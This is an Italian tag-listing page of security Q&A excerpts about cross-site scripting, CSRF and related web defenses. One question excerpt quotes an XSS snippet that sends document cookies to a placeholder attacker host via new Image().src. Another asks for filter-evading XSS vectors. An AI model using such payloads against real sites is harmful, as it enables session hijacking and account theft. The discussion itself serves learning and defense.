Domande con tag 'xss'

domande con tag
3
risposte

Che cos'è un buon vettore XSS senza barre e spazi in avanti?

Ho bisogno di un vettore XSS che non usi barre o spazi. Ho esaminato elenchi di centinaia di vettori, ma di solito hanno uno di questi due. Lo spazio ottiene la codifica URL e qualsiasi cosa dopo che una barra viene eliminata. Ho provato cose...
posta 27.12.2013 - 01:31
4
risposte

Un cookie sicuro senza il flag HttpOnly è un problema?

Comprendo che i cookie con il flag di sicurezza devono essere trasmessi tramite una connessione HTTPS. Significa anche che questi cookie devono essere protetti dagli avversari (cookie privati). Pertanto, è importante impostare il flag HttpOnly s...
posta 11.04.2017 - 06:29
2
risposte

In che modo i siti Stack Exchange si proteggono da XSS? [duplicare]

Mi sembra che, poiché gli utenti possono inserire domande e commenti al loro interno con markup HTML (possibilmente tag <script> ), i siti Stack Exchange sarebbero molto esposti agli attacchi XSS. Come proteggono da questo?     
posta 30.01.2015 - 20:52
2
risposte

Cos'è la mutazione XSS (mXSS)?

Non sono riuscito a trovare alcuna buona documentazione o altro su mXSS. Qualcuno può dare qualche informazione o dare un link? Ho trovato un video e un PDF della presentazione del video: link link     
posta 11.12.2013 - 16:43
2
risposte

Come risolvere i problemi di sicurezza XSS in FCKeditor / CKeditor?

Un rapporto sulla sicurezza che abbiamo condotto tramite una società esterna ha segnalato le vulnerabilità XSS in FCKeditor che stiamo utilizzando nella nostra applicazione PHP. Hanno sottolineato che l'accesso a URL come: http://www.ourdom...
posta 05.01.2011 - 13:28
2
risposte

Tipo 2 XSS vs CSRF

Cercando di creare una conoscenza approfondita di XSS e CSRF, sono chiaro che un xx di tipo 2 implica un exploit persistente sul server. es. <SCRIPT type="text/javascript"> new Image().src = 'http://www.attacker.com/evil.php?cookie='...
posta 12.05.2013 - 09:10
2
risposte

Quanto è affidabile la funzione di convalida delle richieste di ASP.NET?

ASP.NET offre un ulteriore livello per proteggere la tua applicazione dagli attacchi XSS e dall'iniezione in generale, che si chiama Richiedi convalida . Nel loro argomento ufficiale, dicono che: Even if you're using request validatio...
posta 26.06.2013 - 23:06
2
risposte

La protezione CSRF incorporata di Django è sufficiente?

Django imposta un token di protezione CSRF sulla macchina dell'utente tramite un cookie. Richiede quindi il token sulle richieste POST. Se questi due non corrispondono, restituisce un 403. Se cambio manualmente sia il cookie che il valore del...
posta 17.12.2013 - 20:49
1
risposta

Come segnalare una vulnerabilità in un sito che vuole chiamare l'FBI?

Di recente stavo navigando in un sito che sembrava fosse stato progettato nel 2000. Tuttavia, questo sito ha un buon rank di Alexa e una community online piuttosto attiva. Per la protezione del sito, non fornirò dettagli specifici sul sito. H...
posta 12.04.2018 - 22:44
3
risposte

Come posso eseguire un XSS quando un'applicazione web trasforma un dato da minuscolo a maiuscolo?

Sto testando un'applicazione web, quando invio un dato di input all'applicazione web, questo pone i dati in una funzione onclick , qualcosa del genere: <a href="#" onclick="someFunction('dataFromServer', '0');">link</a> Ma l...
posta 17.03.2016 - 20:51